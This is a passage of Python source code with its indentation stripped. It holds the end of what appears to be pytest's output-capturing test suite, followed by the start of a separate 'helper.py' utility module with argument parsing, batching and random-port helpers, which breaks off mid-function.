def test_fixture_use_by_other_fixtures(self, testdir, fixture):
"""Ensure that capsys and capfd can be used by other fixtures during
setup and teardown."""
testdir.makepyfile(
"""\
import sys
import pytest
@pytest.fixture
def captured_print({fixture}):
print('stdout contents begin')
print('stderr contents begin', file=sys.stderr)
out, err = {fixture}.readouterr()
yield out, err
print('stdout contents end')
print('stderr contents end', file=sys.stderr)
out, err = {fixture}.readouterr()
assert out == 'stdout contents end\\n'
assert err == 'stderr contents end\\n'
def test_captured_print(captured_print):
out, err = captured_print
assert out == 'stdout contents begin\\n'
assert err == 'stderr contents begin\\n'
""".format(
fixture=fixture
)
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(["*1 passed*"])
result.stdout.no_fnmatch_line("*stdout contents begin*")
result.stdout.no_fnmatch_line("*stderr contents begin*")
@pytest.mark.parametrize("cap", ["capsys", "capfd"])
def test_fixture_use_by_other_fixtures_teardown(self, testdir, cap):
"""Ensure we can access setup and teardown buffers from teardown when using capsys/capfd (##3033)"""
testdir.makepyfile(
"""\
import sys
import pytest
import os
@pytest.fixture()
def fix({cap}):
print("setup out")
sys.stderr.write("setup err\\n")
yield
out, err = {cap}.readouterr()
assert out == 'setup out\\ncall out\\n'
assert err == 'setup err\\ncall err\\n'
def test_a(fix):
print("call out")
sys.stderr.write("call err\\n")
""".format(
cap=cap
)
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_setup_failure_does_not_kill_capturing(testdir):
sub1 = testdir.mkpydir("sub1")
sub1.join("conftest.py").write(
textwrap.dedent(
"""\
def pytest_runtest_setup(item):
raise ValueError(42)
"""
)
)
sub1.join("test_mod.py").write("def test_func1(): pass")
result = testdir.runpytest(testdir.tmpdir, "--traceconfig")
result.stdout.fnmatch_lines(["*ValueError(42)*", "*1 error*"])
def test_capture_conftest_runtest_setup(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest()
assert result.ret == 0
result.stdout.no_fnmatch_line("*hello19*")
def test_capture_badoutput_issue412(testdir):
testdir.makepyfile(
"""
import os
def test_func():
omg = bytearray([1,129,1])
os.write(1, omg)
assert 0
"""
)
result = testdir.runpytest("--capture=fd")
result.stdout.fnmatch_lines(
"""
*def test_func*
*assert 0*
*Captured*
*1 failed*
"""
)
def test_capture_early_option_parsing(testdir):
testdir.makeconftest(
"""
def pytest_runtest_setup():
print("hello19")
"""
)
testdir.makepyfile("def test_func(): pass")
result = testdir.runpytest("-vs")
assert result.ret == 0
assert "hello19" in result.stdout.str()
def test_capture_binary_output(testdir):
testdir.makepyfile(
r"""
import pytest
def test_a():
import sys
import subprocess
subprocess.call([sys.executable, __file__])
def test_foo():
import os;os.write(1, b'\xc3')
if __name__ == '__main__':
test_foo()
"""
)
result = testdir.runpytest("--assert=plain")
result.assert_outcomes(passed=2)
def test_error_during_readouterr(testdir):
"""Make sure we suspend capturing if errors occur during readouterr"""
testdir.makepyfile(
pytest_xyz="""
from _pytest.capture import FDCapture
def bad_snap(self):
raise Exception('boom')
assert FDCapture.snap
FDCapture.snap = bad_snap
"""
)
result = testdir.runpytest_subprocess("-p", "pytest_xyz", "--version")
result.stderr.fnmatch_lines(
["*in bad_snap", " raise Exception('boom')", "Exception: boom"]
)
class TestCaptureIO:
def test_text(self):
f = capture.CaptureIO()
f.write("hello")
s = f.getvalue()
assert s == "hello"
f.close()
def test_unicode_and_str_mixture(self):
f = capture.CaptureIO()
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_write_bytes_to_buffer(self):
"""In python3, stdout / stderr are text io wrappers (exposing a buffer
property of the underlying bytestream). See issue #1407
"""
f = capture.CaptureIO()
f.buffer.write(b"foo\r\n")
assert f.getvalue() == "foo\r\n"
class TestTeeCaptureIO(TestCaptureIO):
def test_text(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("hello")
s1 = f.getvalue()
assert s1 == "hello"
s2 = sio.getvalue()
assert s2 == s1
f.close()
sio.close()
def test_unicode_and_str_mixture(self):
sio = io.StringIO()
f = capture.TeeCaptureIO(sio)
f.write("\u00f6")
pytest.raises(TypeError, f.write, b"hello")
def test_dontreadfrominput():
from _pytest.capture import DontReadFromInput
f = DontReadFromInput()
assert f.buffer is f
assert not f.isatty()
pytest.raises(OSError, f.read)
pytest.raises(OSError, f.readlines)
iter_f = iter(f)
pytest.raises(OSError, next, iter_f)
pytest.raises(UnsupportedOperation, f.fileno)
f.close() # just for completeness
def test_captureresult() -> None:
cr = CaptureResult("out", "err")
assert len(cr) == 2
assert cr.out == "out"
assert cr.err == "err"
out, err = cr
assert out == "out"
assert err == "err"
assert cr[0] == "out"
assert cr[1] == "err"
assert cr == cr
assert cr == CaptureResult("out", "err")
assert cr != CaptureResult("wrong", "err")
assert cr == ("out", "err")
assert cr != ("out", "wrong")
assert hash(cr) == hash(CaptureResult("out", "err"))
assert hash(cr) == hash(("out", "err"))
assert hash(cr) != hash(("out", "wrong"))
assert cr < ("z",)
assert cr < ("z", "b")
assert cr < ("z", "b", "c")
assert cr.count("err") == 1
assert cr.count("wrong") == 0
assert cr.index("err") == 1
with pytest.raises(ValueError):
assert cr.index("wrong") == 0
assert next(iter(cr)) == "out"
assert cr._replace(err="replaced") == ("out", "replaced")
@pytest.fixture
def tmpfile(testdir) -> Generator[BinaryIO, None, None]:
f = testdir.makepyfile("").open("wb+")
yield f
if not f.closed:
f.close()
@contextlib.contextmanager
def lsof_check():
pid = os.getpid()
try:
out = subprocess.check_output(("lsof", "-p", str(pid))).decode()
except (OSError, subprocess.CalledProcessError, UnicodeDecodeError) as exc:
# about UnicodeDecodeError, see note on pytester
pytest.skip("could not run 'lsof' ({!r})".format(exc))
yield
out2 = subprocess.check_output(("lsof", "-p", str(pid))).decode()
len1 = len([x for x in out.split("\n") if "REG" in x])
len2 = len([x for x in out2.split("\n") if "REG" in x])
assert len2 < len1 + 3, out2
class TestFDCapture:
def test_simple(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
data = b"hello"
os.write(fd, data)
pytest.raises(AssertionError, cap.snap)
cap.done()
cap = capture.FDCapture(fd)
cap.start()
os.write(fd, data)
s = cap.snap()
cap.done()
assert s == "hello"
def test_simple_many(self, tmpfile):
for i in range(10):
self.test_simple(tmpfile)
def test_simple_many_check_open_files(self, testdir):
with lsof_check():
with testdir.makepyfile("").open("wb+") as tmpfile:
self.test_simple_many(tmpfile)
def test_simple_fail_second_start(self, tmpfile):
fd = tmpfile.fileno()
cap = capture.FDCapture(fd)
cap.done()
pytest.raises(AssertionError, cap.start)
def test_stderr(self):
cap = capture.FDCapture(2)
cap.start()
print("hello", file=sys.stderr)
s = cap.snap()
cap.done()
assert s == "hello\n"
def test_stdin(self):
cap = capture.FDCapture(0)
cap.start()
x = os.read(0, 100).strip()
cap.done()
assert x == b""
def test_writeorg(self, tmpfile):
data1, data2 = b"foo", b"bar"
cap = capture.FDCapture(tmpfile.fileno())
cap.start()
tmpfile.write(data1)
tmpfile.flush()
cap.writeorg(data2.decode("ascii"))
scap = cap.snap()
cap.done()
assert scap == data1.decode("ascii")
with open(tmpfile.name, "rb") as stmp_file:
stmp = stmp_file.read()
assert stmp == data2
def test_simple_resume_suspend(self):
with saved_fd(1):
cap = capture.FDCapture(1)
cap.start()
data = b"hello"
os.write(1, data)
sys.stdout.write("whatever")
s = cap.snap()
assert s == "hellowhatever"
cap.suspend()
os.write(1, b"world")
sys.stdout.write("qlwkej")
assert not cap.snap()
cap.resume()
os.write(1, b"but now")
sys.stdout.write(" yes\n")
s = cap.snap()
assert s == "but now yes\n"
cap.suspend()
cap.done()
pytest.raises(AssertionError, cap.suspend)
assert repr(cap) == (
"<FDCapture 1 oldfd={} _state='done' tmpfile={!r}>".format(
cap.targetfd_save, cap.tmpfile
)
)
# Should not crash with missing "_old".
assert repr(cap.syscapture) == (
"<SysCapture stdout _old=<UNSET> _state='done' tmpfile={!r}>".format(
cap.syscapture.tmpfile
)
)
def test_capfd_sys_stdout_mode(self, capfd):
assert "b" not in sys.stdout.mode
@contextlib.contextmanager
def saved_fd(fd):
new_fd = os.dup(fd)
try:
yield
finally:
os.dup2(new_fd, fd)
os.close(new_fd)
class TestStdCapture:
captureclass = staticmethod(StdCapture)
@contextlib.contextmanager
def getcapture(self, **kw):
cap = self.__class__.captureclass(**kw)
cap.start_capturing()
try:
yield cap
finally:
cap.stop_capturing()
def test_capturing_done_simple(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
def test_capturing_reset_simple(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
def test_capturing_readouterr(self):
with self.getcapture() as cap:
print("hello world")
sys.stderr.write("hello error\n")
out, err = cap.readouterr()
assert out == "hello world\n"
assert err == "hello error\n"
sys.stderr.write("error2")
out, err = cap.readouterr()
assert err == "error2"
def test_capture_results_accessible_by_attribute(self):
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
capture_result = cap.readouterr()
assert capture_result.out == "hello"
assert capture_result.err == "world"
def test_capturing_readouterr_unicode(self):
with self.getcapture() as cap:
print("hxąć")
out, err = cap.readouterr()
assert out == "hxąć\n"
def test_reset_twice_error(self):
with self.getcapture() as cap:
print("hello")
out, err = cap.readouterr()
pytest.raises(ValueError, cap.stop_capturing)
assert out == "hello\n"
assert not err
def test_capturing_modify_sysouterr_in_between(self):
oldout = sys.stdout
olderr = sys.stderr
with self.getcapture() as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
sys.stdout = capture.CaptureIO()
sys.stderr = capture.CaptureIO()
print("not seen")
sys.stderr.write("not seen\n")
out, err = cap.readouterr()
assert out == "hello"
assert err == "world"
assert sys.stdout == oldout
assert sys.stderr == olderr
def test_capturing_error_recursive(self):
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\n"
assert out2 == "cap2\n"
def test_just_out_capture(self):
with self.getcapture(out=True, err=False) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert out == "hello"
assert not err
def test_just_err_capture(self):
with self.getcapture(out=False, err=True) as cap:
sys.stdout.write("hello")
sys.stderr.write("world")
out, err = cap.readouterr()
assert err == "world"
assert not out
def test_stdin_restored(self):
old = sys.stdin
with self.getcapture(in_=True):
newstdin = sys.stdin
assert newstdin != sys.stdin
assert sys.stdin is old
def test_stdin_nulled_by_default(self):
print("XXX this test may well hang instead of crashing")
print("XXX which indicates an error in the underlying capturing")
print("XXX mechanisms")
with self.getcapture():
pytest.raises(OSError, sys.stdin.read)
class TestTeeStdCapture(TestStdCapture):
captureclass = staticmethod(TeeStdCapture)
def test_capturing_error_recursive(self):
r"""For TeeStdCapture since we passthrough stderr/stdout, cap1
should get all output, while cap2 should only get "cap2\n"."""
with self.getcapture() as cap1:
print("cap1")
with self.getcapture() as cap2:
print("cap2")
out2, err2 = cap2.readouterr()
out1, err1 = cap1.readouterr()
assert out1 == "cap1\ncap2\n"
assert out2 == "cap2\n"
class TestStdCaptureFD(TestStdCapture):
captureclass = staticmethod(StdCaptureFD)
def test_simple_only_fd(self, testdir):
testdir.makepyfile(
"""\
import os
def test_x():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_x*
*assert 0*
*Captured stdout*
"""
)
def test_intermingling(self):
with self.getcapture() as cap:
os.write(1, b"1")
sys.stdout.write(str(2))
sys.stdout.flush()
os.write(1, b"3")
os.write(2, b"a")
sys.stderr.write("b")
sys.stderr.flush()
os.write(2, b"c")
out, err = cap.readouterr()
assert out == "123"
assert err == "abc"
def test_many(self, capfd):
with lsof_check():
for i in range(10):
cap = StdCaptureFD()
cap.start_capturing()
cap.stop_capturing()
class TestStdCaptureFDinvalidFD:
def test_stdcapture_fd_invalid_fd(self, testdir):
testdir.makepyfile(
"""
import os
from fnmatch import fnmatch
from _pytest import capture
def StdCaptureFD(out=True, err=True, in_=True):
return capture.MultiCapture(
in_=capture.FDCapture(0) if in_ else None,
out=capture.FDCapture(1) if out else None,
err=capture.FDCapture(2) if err else None,
)
def test_stdout():
os.close(1)
cap = StdCaptureFD(out=True, err=False, in_=False)
assert fnmatch(repr(cap.out), "<FDCapture 1 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(1, b"stdout")
assert cap.readouterr() == ("stdout", "")
cap.stop_capturing()
def test_stderr():
os.close(2)
cap = StdCaptureFD(out=False, err=True, in_=False)
assert fnmatch(repr(cap.err), "<FDCapture 2 oldfd=* _state='initialized' tmpfile=*>")
cap.start_capturing()
os.write(2, b"stderr")
assert cap.readouterr() == ("", "stderr")
cap.stop_capturing()
def test_stdin():
os.close(0)
cap = StdCaptureFD(out=False, err=False, in_=True)
assert fnmatch(repr(cap.in_), "<FDCapture 0 oldfd=* _state='initialized' tmpfile=*>")
cap.stop_capturing()
"""
)
result = testdir.runpytest_subprocess("--capture=fd")
assert result.ret == 0
assert result.parseoutcomes()["passed"] == 3
def test_fdcapture_invalid_fd_with_fd_reuse(self, testdir):
with saved_fd(1):
os.close(1)
cap = capture.FDCaptureBinary(1)
cap.start()
os.write(1, b"started")
cap.suspend()
os.write(1, b" suspended")
cap.resume()
os.write(1, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(1, b"done")
def test_fdcapture_invalid_fd_without_fd_reuse(self, testdir):
with saved_fd(1), saved_fd(2):
os.close(1)
os.close(2)
cap = capture.FDCaptureBinary(2)
cap.start()
os.write(2, b"started")
cap.suspend()
os.write(2, b" suspended")
cap.resume()
os.write(2, b" resumed")
assert cap.snap() == b"started resumed"
cap.done()
with pytest.raises(OSError):
os.write(2, b"done")
def test_capture_not_started_but_reset():
capsys = StdCapture()
capsys.stop_capturing()
def test_using_capsys_fixture_works_with_sys_stdout_encoding(capsys):
test_text = "test text"
print(test_text.encode(sys.stdout.encoding, "replace"))
(out, err) = capsys.readouterr()
assert out
assert err == ""
def test_capsys_results_accessible_by_attribute(capsys):
sys.stdout.write("spam")
sys.stderr.write("eggs")
capture_result = capsys.readouterr()
assert capture_result.out == "spam"
assert capture_result.err == "eggs"
def test_fdcapture_tmpfile_remains_the_same() -> None:
cap = StdCaptureFD(out=False, err=True)
try:
cap.start_capturing()
capfile = cap.err.tmpfile
cap.readouterr()
finally:
cap.stop_capturing()
capfile2 = cap.err.tmpfile
assert capfile2 == capfile
def test_close_and_capture_again(testdir):
testdir.makepyfile(
"""
import os
def test_close():
os.close(1)
def test_capture_again():
os.write(1, b"hello\\n")
assert 0
"""
)
result = testdir.runpytest_subprocess()
result.stdout.fnmatch_lines(
"""
*test_capture_again*
*assert 0*
*stdout*
*hello*
"""
)
@pytest.mark.parametrize(
"method", ["SysCapture(2)", "SysCapture(2, tee=True)", "FDCapture(2)"]
)
def test_capturing_and_logging_fundamentals(testdir, method: str) -> None:
# here we check a fundamental feature
p = testdir.makepyfile(
"""
import sys, os
import py, logging
from _pytest import capture
cap = capture.MultiCapture(
in_=None,
out=None,
err=capture.%s,
)
cap.start_capturing()
logging.warning("hello1")
outerr = cap.readouterr()
print("suspend, captured %%s" %%(outerr,))
logging.warning("hello2")
cap.pop_outerr_to_orig()
logging.warning("hello3")
outerr = cap.readouterr()
print("suspend2, captured %%s" %% (outerr,))
"""
% (method,)
)
result = testdir.runpython(p)
result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "replace"
assert sys.stderr.errors == "replace"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win"), reason="only on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams() -> None:
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = cast(TextIO, DummyStream())
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*OSError*")
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, capture, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
out = result_with_capture.stdout.str()
assert ("TypeError: write() argument must be str, not bytes" in out) or (
"TypeError: unicode argument expected, got 'bytes'" in out
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
def test_encodedfile_writelines(tmpfile: BinaryIO) -> None:
ef = capture.EncodedFile(tmpfile, encoding="utf-8")
with pytest.raises(TypeError):
ef.writelines([b"line1", b"line2"])
assert ef.writelines(["line3", "line4"]) is None # type: ignore[func-returns-value]
ef.flush()
tmpfile.seek(0)
assert tmpfile.read() == b"line3line4"
tmpfile.close()
with pytest.raises(ValueError):
ef.read()
def test__get_multicapture() -> None:
assert isinstance(_get_multicapture("no"), MultiCapture)
pytest.raises(ValueError, _get_multicapture, "unknown").match(
r"^unknown capturing method: 'unknown'"
)
def test_logging_while_collecting(testdir):
"""Issue #6240: Calls to logging.xxx() during collection causes all logging calls to be duplicated to stderr"""
p = testdir.makepyfile(
"""\
import logging
logging.warning("during collection")
def test_logging():
logging.warning("during call")
assert False
"""
)
result = testdir.runpytest_subprocess(p)
assert result.ret == ExitCode.TESTS_FAILED
result.stdout.fnmatch_lines(
[
"*test_*.py F*",
"====* FAILURES *====",
"____*____",
"*--- Captured log call*",
"WARNING * during call",
"*1 failed*",
]
)
result.stdout.no_fnmatch_line("*Captured stderr call*")
result.stdout.no_fnmatch_line("*during collection*")
|
helper.py
|
import asyncio
import functools
import json
import math
import os
import random
import re
import sys
import threading
import time
import uuid
import warnings
from argparse import ArgumentParser, Namespace
from datetime import datetime
from itertools import islice
from types import SimpleNamespace
from typing import (
Tuple,
Optional,
Iterator,
Any,
Union,
List,
Dict,
Set,
Sequence,
Iterable,
)
__all__ = [
'batch_iterator',
'parse_arg',
'random_port',
'random_identity',
'random_uuid',
'expand_env_var',
'colored',
'ArgNamespace',
'is_valid_local_config_source',
'cached_property',
'typename',
'get_public_ip',
'get_internal_ip',
'convert_tuple_to_list',
'run_async',
'deprecated_alias',
'countdown',
'CatchAllCleanupContextManager',
'download_mermaid_url',
'get_readable_size',
'get_or_reuse_loop',
]
def deprecated_alias(**aliases):
"""
Usage, kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
With level 0 means warning, level 1 means exception.
For example:
.. highlight:: python
.. code-block:: python
@deprecated_alias(input_fn=('inputs', 0), buffer=('input_fn', 0), callback=('on_done', 1), output_fn=('on_done', 1))
:param aliases: maps aliases to new arguments
:return: wrapper
"""
from .excepts import NotSupportedError
def _rename_kwargs(func_name: str, kwargs, aliases):
"""
Raise warnings or exceptions for deprecated arguments.
:param func_name: Name of the function.
:param kwargs: key word arguments from the function which is decorated.
:param aliases: kwargs with key as the deprecated arg name and value be a tuple, (new_name, deprecate_level).
"""
for alias, new_arg in aliases.items():
if not isinstance(new_arg, tuple):
raise ValueError(
f'{new_arg} must be a tuple, with first element as the new name, '
f'second element as the deprecated level: 0 as warning, 1 as exception'
)
if alias in kwargs:
new_name, dep_level = new_arg
if new_name in kwargs:
raise NotSupportedError(
f'{func_name} received both {alias} and {new_name}'
)
if dep_level == 0:
warnings.warn(
f'`{alias}` is renamed to `{new_name}` in `{func_name}()`, the usage of `{alias}` is '
f'deprecated and will be removed in the next version.',
DeprecationWarning,
)
kwargs[new_name] = kwargs.pop(alias)
elif dep_level == 1:
raise NotSupportedError(f'{alias} has been renamed to `{new_name}`')
def deco(f):
"""
Set Decorator function.
:param f: function the decorator is used for
:return: wrapper
"""
@functools.wraps(f)
def wrapper(*args, **kwargs):
"""
Set wrapper function.
:param args: wrapper arguments
:param kwargs: wrapper key word arguments
:return: result of renamed function.
"""
_rename_kwargs(f.__name__, kwargs, aliases)
return f(*args, **kwargs)
return wrapper
return deco
def get_readable_size(num_bytes: Union[int, float]) -> str:
"""
Transform the bytes into readable value with different units (e.g. 1 KB, 20 MB, 30.1 GB).
:param num_bytes: Number of bytes.
:return: Human readable string representation.
"""
num_bytes = int(num_bytes)
if num_bytes < 1024:
return f'{num_bytes} Bytes'
elif num_bytes < 1024 ** 2:
return f'{num_bytes / 1024:.1f} KB'
elif num_bytes < 1024 ** 3:
return f'{num_bytes / (1024 ** 2):.1f} MB'
else:
return f'{num_bytes / (1024 ** 3):.1f} GB'
def batch_iterator(
data: Iterable[Any],
batch_size: int,
axis: int = 0,
) -> Iterator[Any]:
"""
Get an iterator of batches of data.
For example:
.. highlight:: python
.. code-block:: python
for req in batch_iterator(data, batch_size, split_over_axis):
# Do something with batch
:param data: Data source.
:param batch_size: Size of one batch.
:param axis: Determine which axis to iterate for np.ndarray data.
:yield: data
:return: An Iterator of batch data.
"""
import numpy as np
if not batch_size or batch_size <= 0:
yield data
return
if isinstance(data, np.ndarray):
_l = data.shape[axis]
_d = data.ndim
sl = [slice(None)] * _d
if batch_size >= _l:
yield data
return
for start in range(0, _l, batch_size):
end = min(_l, start + batch_size)
sl[axis] = slice(start, end)
yield data[tuple(sl)]
elif isinstance(data, Sequence):
if batch_size >= len(data):
yield data
return
for _ in range(0, len(data), batch_size):
yield data[_ : _ + batch_size]
elif isinstance(data, Iterable):
# as iterator, there is no way to know the length of it
iterator = iter(data)
while True:
chunk = tuple(islice(iterator, batch_size))
if not chunk:
return
yield chunk
else:
raise TypeError(f'unsupported type: {type(data)}')
def parse_arg(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Parse the arguments from string to `Union[bool, int, str, list, float]`.
:param v: The string of arguments
:return: The parsed arguments list.
"""
m = re.match(r'^[\'"](.*)[\'"]$', v)
if m:
return m.group(1)
if v.startswith('[') and v.endswith(']'):
# function args must be immutable tuples not list
tmp = v.replace('[', '').replace(']', '').strip().split(',')
if len(tmp) > 0:
return [parse_arg(vv.strip()) for vv in tmp]
else:
return []
try:
v = int(v) # parse int parameter
except ValueError:
try:
v = float(v) # parse float parameter
except ValueError:
if len(v) == 0:
# ignore it when the parameter is empty
v = None
elif v.lower() == 'true': # parse boolean parameter
v = True
elif v.lower() == 'false':
v = False
return v
def countdown(t: int, reason: str = 'I am blocking this thread') -> None:
"""
Display the countdown in console.
For example:
.. highlight:: python
.. code-block:: python
countdown(10, reason=colored('re-fetch access token', 'cyan', attrs=['bold', 'reverse']))
:param t: Countdown time.
:param reason: A string message of reason for this Countdown.
"""
try:
sys.stdout.write('\n')
sys.stdout.flush()
while t > 0:
t -= 1
msg = f'⏳ {colored("%3d" % t, "yellow")}s left: {reason}'
sys.stdout.write(f'\r{msg}')
sys.stdout.flush()
time.sleep(1)
sys.stdout.write('\n')
sys.stdout.flush()
except KeyboardInterrupt:
sys.stdout.write('no more patience? good bye!')
_random_names = (
(
'first',
'great',
'local',
'small',
'right',
'large',
'young',
'early',
'major',
'clear',
'black',
'whole',
'third',
'white',
'short',
'human',
'royal',
'wrong',
'legal',
'final',
'close',
'total',
'prime',
'happy',
'sorry',
'basic',
'aware',
'ready',
'green',
'heavy',
'extra',
'civil',
'chief',
'usual',
'front',
'fresh',
'joint',
'alone',
'rural',
'light',
'equal',
'quiet',
'quick',
'daily',
'urban',
'upper',
'moral',
'vital',
'empty',
'brief',
),
(
'world',
'house',
'place',
'group',
'party',
'money',
'point',
'state',
'night',
'water',
'thing',
'order',
'power',
'court',
'level',
'child',
'south',
'staff',
'woman',
'north',
'sense',
'death',
'range',
'table',
'trade',
'study',
'other',
'price',
'class',
'union',
'value',
'paper',
'right',
'voice',
'stage',
'light',
'march',
'board',
'month',
'music',
'field',
'award',
'issue',
'basis',
'front',
'heart',
'force',
'model',
'space',
'peter',
),
)
def random_name() -> str:
"""
Generate a random name from list.
:return: A Random name.
"""
return '_'.join(random.choice(_random_names[j]) for j in range(2))
def random_port() -> Optional[int]:
"""
Get a random available port number from '49153' to '65535'.
:return: A random port.
"""
import threading
import multiprocessing
from contextlib import closing
import socket
def _get_port(port=0):
with multiprocessing.Lock():
with threading.Lock():
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as s:
try:
s.bind(('', port))
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
return s.getsockname()[1]
except OSError:
pass
_port = None
if 'JINA_RANDOM_PORT_MIN' in os.environ or 'JINA_RANDOM_PORT_MAX' in os.environ:
min_port = int(os.environ.get('JINA_RANDOM_PORT_MIN', '49153'))
max_port = int(os.environ.get('JINA_RANDOM_PORT_MAX', '65535'))
all_ports = list(range(min_port, max_port + 1))
random.shuffle(all_ports)
for _port in all_ports:
if _get_port(_port) is not None:
break
else:
raise OSError(
f'can not find an available port between [{min_port}, {max_port}].'
)
else:
_port = _get_port()
return int(_port)
def random_identity(use_uuid1: bool = False) -> str:
"""
Generate random UUID.
..note::
A MAC address or time-based ordering (UUID1) can afford increased database performance, since it's less work
to sort numbers closer-together than those distributed randomly (UUID4) (see here).
A second related issue, is that using UUID1 can be useful in debugging, even if origin data is lost or not
explicitly stored.
:param use_uuid1: use UUID1 instead of UUID4. This is the default Document ID generator.
:return: A random UUID.
"""
return str(random_uuid(use_uuid1))
def random_uuid(use_uuid1: bool = False) -> uuid.UUID:
"""
Get a random UUID.
:param use_uuid1: Use UUID1 if True, else use UUID4.
:return: A random UUID.
"""
return uuid.uuid1() if use_uuid1 else uuid.uuid4()
def expand_env_var(v: str) -> Optional[Union[bool, int, str, list, float]]:
"""
Expand the environment variables.
:param v: String of environment variables.
:return: Parsed environment variables.
"""
if isinstance(v, str):
return parse_arg(os.path.expandvars(v))
else:
return v
def expand_dict(
d: Dict, expand_fn=expand_env_var, resolve_cycle_ref=True
) -> Dict[str, Any]:
"""
Expand variables from YAML file.
:param d: Target Dict.
:param expand_fn: Parsed environment variables.
:param resolve_cycle_ref: Defines if cyclic references should be resolved.
:return: Expanded variables.
"""
expand_map = SimpleNamespace()
pat = re.compile(r'{.+}|\$[a-zA-Z0-9_]*\b')
def _scan(sub_d: Union[Dict, List], p):
if isinstance(sub_d, dict):
for k, v in sub_d.items():
if isinstance(v, dict):
p.__dict__[k] = SimpleNamespace()
_scan(v, p.__dict__[k])
elif isinstance(v, list):
p.__dict__[k] = list()
_scan(v, p.__dict__[k])
else:
p.__dict__[k] = v
elif isinstance(sub_d, list):
for idx, v in enumerate(sub_d):
if isinstance(v, dict):
p.append(SimpleNamespace())
_scan(v, p[idx])
elif isinstance(v, list):
p.append(list())
_scan(v, p[idx])
else:
p.append(v)
def _replace(sub_d: Union[Dict, List], p):
